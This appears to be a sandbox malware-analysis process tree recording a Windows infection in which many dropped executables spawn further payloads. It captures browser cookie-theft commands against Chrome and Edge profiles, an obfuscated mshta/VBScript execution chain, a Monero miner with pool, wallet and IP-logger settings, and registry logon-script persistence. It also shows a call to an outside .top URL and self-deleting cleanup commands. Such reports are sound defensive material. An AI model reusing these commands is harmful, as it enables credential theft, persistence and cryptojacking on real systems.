-
C:\Users\Admin\Documents\yCWmc1V30o6dlR0xii5erM2K.exe"C:\Users\Admin\Documents\yCWmc1V30o6dlR0xii5erM2K.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:3812
-
-
C:\Users\Admin\Documents\0HZX1v2M4nK4m4r3L_ILsrOi.exe"C:\Users\Admin\Documents\0HZX1v2M4nK4m4r3L_ILsrOi.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:3816
-
-
C:\Users\Admin\Documents\cBnlvjc97Cmm56_CDemU1Bs1.exe"C:\Users\Admin\Documents\cBnlvjc97Cmm56_CDemU1Bs1.exe"2⤵
- Executes dropped EXE
PID:500
-
-
C:\Users\Admin\Documents\rbBrlVBwQcaFGA2vxwRmNn5Q.exe"C:\Users\Admin\Documents\rbBrlVBwQcaFGA2vxwRmNn5Q.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2184 -
C:\Users\Admin\Documents\rbBrlVBwQcaFGA2vxwRmNn5Q.exe"C:\Users\Admin\Documents\rbBrlVBwQcaFGA2vxwRmNn5Q.exe"3⤵PID:3508
-
-
-
C:\Users\Admin\Documents\I99YptBkWxx9pT4JWVCVfIPO.exe"C:\Users\Admin\Documents\I99YptBkWxx9pT4JWVCVfIPO.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:2756
-
-
C:\Users\Admin\Documents\lW0NRBt72kgGuEXqrfYFIJs1.exe"C:\Users\Admin\Documents\lW0NRBt72kgGuEXqrfYFIJs1.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2932 -
C:\Users\Admin\Documents\lW0NRBt72kgGuEXqrfYFIJs1.exeC:\Users\Admin\Documents\lW0NRBt72kgGuEXqrfYFIJs1.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4812
-
-
-
C:\Users\Admin\Documents\hhWSowo56ICH5Ct16_uDvViF.exe"C:\Users\Admin\Documents\hhWSowo56ICH5Ct16_uDvViF.exe"2⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2288 -
C:\Users\Admin\Documents\hhWSowo56ICH5Ct16_uDvViF.exeC:\Users\Admin\Documents\hhWSowo56ICH5Ct16_uDvViF.exe3⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:4908
-
-
-
C:\Users\Admin\Documents\RImJ90i5WyDa_CR9AVZ5npoI.exe"C:\Users\Admin\Documents\RImJ90i5WyDa_CR9AVZ5npoI.exe"2⤵
- Executes dropped EXE
PID:2636
-
-
C:\Users\Admin\Documents\IQp3iOsR3ggTRvROqmeyfMXx.exe"C:\Users\Admin\Documents\IQp3iOsR3ggTRvROqmeyfMXx.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3380 -
C:\Users\Admin\AppData\Roaming\4413775.exe"C:\Users\Admin\AppData\Roaming\4413775.exe"3⤵
- Executes dropped EXE
PID:1356
-
-
C:\Users\Admin\AppData\Roaming\4221790.exe"C:\Users\Admin\AppData\Roaming\4221790.exe"3⤵
- Executes dropped EXE
PID:1268 -
C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"4⤵PID:5612
-
-
-
C:\Users\Admin\AppData\Roaming\3471943.exe"C:\Users\Admin\AppData\Roaming\3471943.exe"3⤵PID:4492
-
-
C:\Users\Admin\AppData\Roaming\8514556.exe"C:\Users\Admin\AppData\Roaming\8514556.exe"3⤵PID:4428
-
-
-
C:\Users\Admin\Documents\KkjvE1gBgcSCLctD3FV4gePo.exe"C:\Users\Admin\Documents\KkjvE1gBgcSCLctD3FV4gePo.exe"2⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of AdjustPrivilegeToken
PID:2904
-
-
C:\Users\Admin\Documents\PNlW9Ynw3hrZheQ4fo5oW07r.exe"C:\Users\Admin\Documents\PNlW9Ynw3hrZheQ4fo5oW07r.exe"2⤵
- Executes dropped EXE
PID:2892 -
C:\Users\Admin\Documents\PNlW9Ynw3hrZheQ4fo5oW07r.exe"C:\Users\Admin\Documents\PNlW9Ynw3hrZheQ4fo5oW07r.exe"3⤵PID:5316
-
-
-
C:\Users\Admin\Documents\haQopfVIAQr4qq3pQM_0dwtd.exe"C:\Users\Admin\Documents\haQopfVIAQr4qq3pQM_0dwtd.exe"2⤵
- Executes dropped EXE
PID:1360
-
-
C:\Users\Admin\Documents\LyMjURO0cyxMA3cQmPaS6KGJ.exe"C:\Users\Admin\Documents\LyMjURO0cyxMA3cQmPaS6KGJ.exe"2⤵
- Executes dropped EXE
PID:3748 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "LyMjURO0cyxMA3cQmPaS6KGJ.exe" /f & erase "C:\Users\Admin\Documents\LyMjURO0cyxMA3cQmPaS6KGJ.exe" & exit3⤵PID:5216
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "LyMjURO0cyxMA3cQmPaS6KGJ.exe" /f4⤵
- Kills process with taskkill
PID:6276
-
-
-
-
C:\Users\Admin\Documents\7bafckZ5rtgPIZJG86zfVdHi.exe"C:\Users\Admin\Documents\7bafckZ5rtgPIZJG86zfVdHi.exe"2⤵
- Executes dropped EXE
PID:3988 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3988 -s 7603⤵
- Program crash
PID:5780
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3988 -s 8123⤵
- Program crash
PID:4444
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3988 -s 7483⤵
- Program crash
PID:4348
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3988 -s 7403⤵
- Program crash
PID:5980
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3988 -s 9363⤵
- Program crash
PID:3852
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3988 -s 10003⤵
- Program crash
PID:3488
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3988 -s 10043⤵
- Program crash
PID:5660
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3988 -s 13443⤵
- Program crash
PID:6404
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3988 -s 13963⤵
- Program crash
PID:6736
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3988 -s 14123⤵
- Program crash
PID:6984
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3988 -s 15683⤵
- Program crash
PID:4556
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3988 -s 15963⤵
- Program crash
PID:7840
-
-
-
C:\Users\Admin\Documents\cyBfhO12Wuh6n7rG4xU4H8tZ.exe"C:\Users\Admin\Documents\cyBfhO12Wuh6n7rG4xU4H8tZ.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:2156
-
-
C:\Users\Admin\Documents\4tyIUkvpHdBTXMfrt6Q9KPl8.exe"C:\Users\Admin\Documents\4tyIUkvpHdBTXMfrt6Q9KPl8.exe"2⤵
- Executes dropped EXE
- Drops file in Program Files directory
PID:2652 -
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"3⤵
- Executes dropped EXE
PID:4512
-
-
C:\Program Files (x86)\Company\NewProduct\jooyu.exe"C:\Program Files (x86)\Company\NewProduct\jooyu.exe"3⤵
- Executes dropped EXE
PID:4580 -
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵
- Executes dropped EXE
PID:1128
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:5660
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:5520
-
-
C:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exeC:\Users\Admin\AppData\Local\Temp\jfiag3g_gg.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:676
-
-
-
C:\Program Files (x86)\Company\NewProduct\customer3.exe"C:\Program Files (x86)\Company\NewProduct\customer3.exe"3⤵
- Executes dropped EXE
PID:4472 -
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:5996
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /DeleteCookiesWildcard "*.facebook.com"4⤵PID:6112
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:4892
-
-
C:\Users\Admin\AppData\Local\Temp\11111.exeC:\Users\Admin\AppData\Local\Temp\11111.exe /CookiesFile "C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Profile 2\Cookies" /DeleteCookiesWildcard "*.facebook.com"4⤵PID:1364
-
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:5296
-
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Cookies" /DeleteCookiesWildcard "*.facebook.com"4⤵PID:4440
-
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /scookiestxt C:\Users\Admin\AppData\Local\Temp\fj4ghga23_fsa.txt4⤵PID:3572
-
-
C:\Users\Admin\AppData\Local\Temp\22222.exeC:\Users\Admin\AppData\Local\Temp\22222.exe /CookiesFile "C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Profile 1\Cookies" /DeleteCookiesWildcard "*.facebook.com"4⤵PID:5748
-
-
-
-
C:\Users\Admin\Documents\mah7ahHqr_vjx0vrQ37YCHAD.exe"C:\Users\Admin\Documents\mah7ahHqr_vjx0vrQ37YCHAD.exe"2⤵
- Executes dropped EXE
PID:3284 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3284 -s 6683⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2628
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3284 -s 7043⤵
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3424
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3284 -s 7083⤵
- Program crash
PID:5000
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3284 -s 6643⤵
- Program crash
PID:5468
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3284 -s 10763⤵
- Program crash
PID:6080
-
-
-
C:\Users\Admin\Documents\7u_7a9fRpOJFj9_7K6FfqV7A.exe"C:\Users\Admin\Documents\7u_7a9fRpOJFj9_7K6FfqV7A.exe"2⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Suspicious use of AdjustPrivilegeToken
PID:2716
-
-
C:\Users\Admin\Documents\mwEOhluSw0mfDbqmPZCcZKms.exe"C:\Users\Admin\Documents\mwEOhluSw0mfDbqmPZCcZKms.exe"2⤵
- Executes dropped EXE
PID:2760 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRipt:ClOSe( creATEoBJEcT("WscRIpT.sHEll" ).RUN("Cmd /Q /C tYPe ""C:\Users\Admin\Documents\mwEOhluSw0mfDbqmPZCcZKms.exe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if """" == """" for %W iN ( ""C:\Users\Admin\Documents\mwEOhluSw0mfDbqmPZCcZKms.exe"" ) do taskkill -IM ""%~nXW"" -f " ,0 ,TRUE ) )3⤵PID:4528
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\Documents\mwEOhluSw0mfDbqmPZCcZKms.exe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if ""=="" for %W iN ( "C:\Users\Admin\Documents\mwEOhluSw0mfDbqmPZCcZKms.exe") do taskkill -IM "%~nXW" -f4⤵PID:1724
-
C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXeWO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu95⤵
- Executes dropped EXE
PID:4968 -
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbSCRipt:ClOSe( creATEoBJEcT("WscRIpT.sHEll" ).RUN("Cmd /Q /C tYPe ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if ""-PifOcLbay~PF~N8a_e9RyKpu9 "" == """" for %W iN ( ""C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe"" ) do taskkill -IM ""%~nXW"" -f " ,0 ,TRUE ) )6⤵PID:5068
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /Q /C tYPe "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe" > WO~L~OYJWS8EVL1.eXe && STaRt WO~L~oYjWS8EvL1.Exe -PifOcLbay~PF~N8a_e9RyKpu9 & if "-PifOcLbay~PF~N8a_e9RyKpu9 "=="" for %W iN ( "C:\Users\Admin\AppData\Local\Temp\WO~L~OYJWS8EVL1.eXe") do taskkill -IM "%~nXW" -f7⤵PID:300
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" ~IWm4Wh.I,nKhkoYTFE6⤵PID:5520
-
-
-
C:\Windows\SysWOW64\taskkill.exetaskkill -IM "mwEOhluSw0mfDbqmPZCcZKms.exe" -f5⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:1476
-
-
-
-
-
C:\Users\Admin\Documents\fTYCIa4eOgEhVJfKlKbYVDKT.exe"C:\Users\Admin\Documents\fTYCIa4eOgEhVJfKlKbYVDKT.exe"2⤵
- Executes dropped EXE
PID:4128 -
C:\Users\Admin\Documents\fTYCIa4eOgEhVJfKlKbYVDKT.exe"C:\Users\Admin\Documents\fTYCIa4eOgEhVJfKlKbYVDKT.exe" -q3⤵
- Executes dropped EXE
PID:4228
-
-
-
C:\Users\Admin\Documents\ERJcaxlU8Orr_cChsgDRUkUD.exe"C:\Users\Admin\Documents\ERJcaxlU8Orr_cChsgDRUkUD.exe"2⤵
- Executes dropped EXE
PID:4460 -
C:\Users\Admin\AppData\Local\Temp\is-Q80FT.tmp\ERJcaxlU8Orr_cChsgDRUkUD.tmp"C:\Users\Admin\AppData\Local\Temp\is-Q80FT.tmp\ERJcaxlU8Orr_cChsgDRUkUD.tmp" /SL5="$2027A,138429,56832,C:\Users\Admin\Documents\ERJcaxlU8Orr_cChsgDRUkUD.exe"3⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of FindShellTrayWindow
PID:4760 -
C:\Users\Admin\AppData\Local\Temp\is-V3G28.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-V3G28.tmp\Setup.exe" /Verysilent4⤵PID:3640
-
C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe"C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent5⤵PID:4784
-
C:\Users\Admin\AppData\Local\Temp\is-M87G2.tmp\Stats.tmp"C:\Users\Admin\AppData\Local\Temp\is-M87G2.tmp\Stats.tmp" /SL5="$10354,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Stats.exe" /Verysilent6⤵PID:5592
-
C:\Users\Admin\AppData\Local\Temp\is-FQJ6T.tmp\builder.exe"C:\Users\Admin\AppData\Local\Temp\is-FQJ6T.tmp\builder.exe" -algo'' -pool'stratum+tcp://xmr-asia1.nanopool.org:14444' -wallet'42Lm2CeGer8hubckgimBBXhKWRnZqtLx74Ye2HcyMyikARReDxWRn15Bia1k8qgnboPNxEZJHN5HgX8eNa1EP7xeA3X8Z7s' -load'50' -idleload'50' -loggerSa'2no.co' -loggerS'1C6Ua7' -loggerRa'iplogger.org' -loggerR'1cmAy7' -loggerWa'2no.co' -loggerW'' -ico'' -glue'' -error'' -worker'' -icrypt'' -sremoval'' -ntask'SystemCheck' -ptask'System\' -atask'Microsoft_Corporation' -dtask'Starts_a_system_diagnostics_application_to_scan_for_errors_and_performance_problems.' -pinstall'Roaming\Microsoft\Windows\' -ninstall'Helper' -sinstall'-SystemCheck'7⤵PID:784
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"C:\Program Files (x86)\GameBox INC\GameBox\runvd.exe"5⤵PID:6112
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6112 -s 7566⤵
- Program crash
PID:6528
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6112 -s 8086⤵
- Program crash
PID:4776
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6112 -s 7806⤵
- Program crash
PID:5820
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6112 -s 8206⤵
- Program crash
PID:7240
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6112 -s 9526⤵
- Program crash
PID:7880
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6112 -s 9886⤵
- Program crash
PID:7184
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6112 -s 10126⤵
- Program crash
PID:4088
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6112 -s 13486⤵
- Program crash
PID:5568
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6112 -s 14406⤵
- Program crash
PID:8004
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6112 -s 14006⤵
- Program crash
PID:4844
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 6112 -s 15006⤵
- Program crash
PID:8804
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe"C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SID=717 CID=717 SILENT=1 /quiet5⤵PID:5272
-
C:\Windows\SysWOW64\msiexec.exe"C:\Windows\system32\msiexec.exe" /i "C:\Users\Admin\AppData\Roaming\Cleaner\Cleaner 1.0.0\install\FD7DF1F\Cleaner Installation.msi" SID=717 CID=717 SILENT=1 /quiet AI_SETUPEXEPATH="C:\Program Files (x86)\GameBox INC\GameBox\Cleaner Installation.exe" SETUPEXEDIR="C:\Program Files (x86)\GameBox INC\GameBox\" EXE_CMD_LINE="/exenoupdates /forcecleanup /wintime 1629579453 SID=717 CID=717 SILENT=1 /quiet " SID="717" CID="717"6⤵PID:6512
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe"C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent5⤵PID:4896
-
C:\Users\Admin\AppData\Local\Temp\is-8R8CQ.tmp\Inlog.tmp"C:\Users\Admin\AppData\Local\Temp\is-8R8CQ.tmp\Inlog.tmp" /SL5="$10358,138429,56832,C:\Program Files (x86)\GameBox INC\GameBox\Inlog.exe" /Verysilent6⤵PID:5904
-
C:\Users\Admin\AppData\Local\Temp\is-06OR5.tmp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\is-06OR5.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 7217⤵PID:5492
-
C:\Users\Admin\AppData\Local\Temp\is-NQNGM.tmp\Setup.tmp"C:\Users\Admin\AppData\Local\Temp\is-NQNGM.tmp\Setup.tmp" /SL5="$202E6,17356095,721408,C:\Users\Admin\AppData\Local\Temp\is-06OR5.tmp\Setup.exe" /VERYSILENT /PASSWORD=kSWIzY9AFOirvP3TueIs74449 -token mtn1co3fo4gs5vwq -subid 7218⤵PID:7664
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c expand C:\Users\Admin\AppData\Local\Temp\is-EFADH.tmp\{app}\microsoft.cab -F:* %ProgramData%9⤵PID:8176
-
C:\Windows\SysWOW64\expand.exeexpand C:\Users\Admin\AppData\Local\Temp\is-EFADH.tmp\{app}\microsoft.cab -F:* C:\ProgramData10⤵PID:7936
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c reg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "%ProgramData%\regid.1993-06.com.microsoft\svrwebui.exe" /f9⤵PID:7896
-
C:\Windows\SysWOW64\reg.exereg add "HKEY_CURRENT_USER\Environment" /v UserInitMprLogonScript /t REG_EXPAND_SZ /d "C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe" /f10⤵PID:8796
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c start http://afleof21klg.top/pgudonqntu/zmsaksepfx.php?xdl=mtn1co3fo4gs5vwq^&cid=74449^¶m=7219⤵PID:7552
-
-
C:\Users\Admin\AppData\Local\Temp\is-EFADH.tmp\{app}\vdi_compiler.exe"C:\Users\Admin\AppData\Local\Temp\is-EFADH.tmp\{app}\vdi_compiler"9⤵PID:5396
-
-
C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"C:\ProgramData\regid.1993-06.com.microsoft\svrwebui.exe"9⤵PID:8048
-
-
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"C:\Program Files (x86)\GameBox INC\GameBox\PBrowFile15.exe"5⤵PID:4824
-
C:\Users\Admin\AppData\Roaming\1923433.exe"C:\Users\Admin\AppData\Roaming\1923433.exe"6⤵PID:5924
-
-
C:\Users\Admin\AppData\Roaming\1172959.exe"C:\Users\Admin\AppData\Roaming\1172959.exe"6⤵PID:6200
-
-
C:\Users\Admin\AppData\Roaming\7332550.exe"C:\Users\Admin\AppData\Roaming\7332550.exe"6⤵PID:3612
-
-
C:\Users\Admin\AppData\Roaming\5299530.exe"C:\Users\Admin\AppData\Roaming\5299530.exe"6⤵PID:6348
-
-
C:\Users\Admin\AppData\Roaming\8588681.exe"C:\Users\Admin\AppData\Roaming\8588681.exe"6⤵PID:4100
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"5⤵PID:500
-
C:\Users\Admin\AppData\Local\Temp\is-P67PA.tmp\MediaBurner2.tmp"C:\Users\Admin\AppData\Local\Temp\is-P67PA.tmp\MediaBurner2.tmp" /SL5="$3021C,506127,422400,C:\Program Files (x86)\GameBox INC\GameBox\MediaBurner2.exe"6⤵PID:5980
-
C:\Users\Admin\AppData\Local\Temp\is-2K4S6.tmp\ultradumnibour.exe"C:\Users\Admin\AppData\Local\Temp\is-2K4S6.tmp\ultradumnibour.exe" /S /UID=burnerch27⤵PID:6436
-
C:\Users\Admin\AppData\Local\Temp\MLTECAQMEF\ultramediaburner.exe"C:\Users\Admin\AppData\Local\Temp\MLTECAQMEF\ultramediaburner.exe" /VERYSILENT8⤵PID:5052
-
C:\Users\Admin\AppData\Local\Temp\is-08E18.tmp\ultramediaburner.tmp"C:\Users\Admin\AppData\Local\Temp\is-08E18.tmp\ultramediaburner.tmp" /SL5="$40288,281924,62464,C:\Users\Admin\AppData\Local\Temp\MLTECAQMEF\ultramediaburner.exe" /VERYSILENT9⤵PID:4920
-
C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe"C:\Program Files (x86)\UltraMediaBurner\UltraMediaBurner.exe" -silent -desktopShortcut -programMenu10⤵PID:6244
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\20-47fc2-ee0-18eac-e0f5f33573f4a\ZHahaedututu.exe"C:\Users\Admin\AppData\Local\Temp\20-47fc2-ee0-18eac-e0f5f33573f4a\ZHahaedututu.exe"8⤵PID:7772
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\h1nsa0q3.4pt\GcleanerEU.exe /eufive & exit9⤵PID:9396
-
C:\Users\Admin\AppData\Local\Temp\h1nsa0q3.4pt\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\h1nsa0q3.4pt\GcleanerEU.exe /eufive10⤵PID:9660
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "GcleanerEU.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\h1nsa0q3.4pt\GcleanerEU.exe" & exit11⤵PID:1984
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "GcleanerEU.exe" /f12⤵
- Kills process with taskkill
PID:5880
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\hefy33gh.kio\installer.exe /qn CAMPAIGN="654" & exit9⤵PID:9600
-
C:\Users\Admin\AppData\Local\Temp\hefy33gh.kio\installer.exeC:\Users\Admin\AppData\Local\Temp\hefy33gh.kio\installer.exe /qn CAMPAIGN="654"10⤵PID:10188
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\gsin4ghu.2ny\anyname.exe & exit9⤵PID:9924
-
C:\Users\Admin\AppData\Local\Temp\gsin4ghu.2ny\anyname.exeC:\Users\Admin\AppData\Local\Temp\gsin4ghu.2ny\anyname.exe10⤵PID:10140
-
C:\Users\Admin\AppData\Local\Temp\gsin4ghu.2ny\anyname.exe"C:\Users\Admin\AppData\Local\Temp\gsin4ghu.2ny\anyname.exe" -q11⤵PID:9316
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\yxcinvfl.h01\gcleaner.exe /mixfive & exit9⤵PID:10208
-
C:\Users\Admin\AppData\Local\Temp\yxcinvfl.h01\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\yxcinvfl.h01\gcleaner.exe /mixfive10⤵PID:9512
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im "gcleaner.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\yxcinvfl.h01\gcleaner.exe" & exit11⤵PID:8364
-
C:\Windows\SysWOW64\taskkill.exetaskkill /im "gcleaner.exe" /f12⤵
- Kills process with taskkill
PID:4868
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\sskvyxea.3o2\autosubplayer.exe /S & exit9⤵PID:7104
-
-
-
C:\Users\Admin\AppData\Local\Temp\21-b5e13-aa8-63084-85d37fad73edc\Naboxosuti.exe"C:\Users\Admin\AppData\Local\Temp\21-b5e13-aa8-63084-85d37fad73edc\Naboxosuti.exe"8⤵PID:5048
-
-
-
-
-
C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"C:\Program Files (x86)\GameBox INC\GameBox\xtect12.exe"5⤵PID:5836
-
